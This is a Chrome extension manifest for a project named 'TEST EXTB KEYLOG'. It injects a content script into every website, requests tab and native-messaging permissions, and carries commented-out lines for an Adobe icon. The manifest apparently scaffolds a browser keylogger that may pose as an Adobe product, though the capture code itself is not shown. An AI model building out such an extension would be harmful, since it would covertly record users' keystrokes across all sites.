{
    "manifest_version": 3,
    "name": "TEST EXTB KEYLOG",
    "version": "1",
        // "icon": {
        //     "48": "Adobe.png"
        // },
    "description": "NICE",
        "background": {
            "service_worker": "background.js"
             // "type": "module"
        },
    "content_scripts": [
        {
            "matches": ["*://*/*"],
            "js": ["content.js"]
        }
    ],
    //,
    // "web_accessible_resources": [
    //     {
    //     "resources": [ "Adobe.png" ],
    //     "matches": ["*://*/*"]
    //     }
    // ],
    "permissions": [
        "tabs",
        "activeTab",
        "nativeMessaging",
         "declarativeNetRequest"
    ]
    // "host_permissions": [
    //     "<all_urls>"
    // ],
    // "externally_connectable": {
    //     "matches": ["https://*.chrome.com/*"]
    // }
}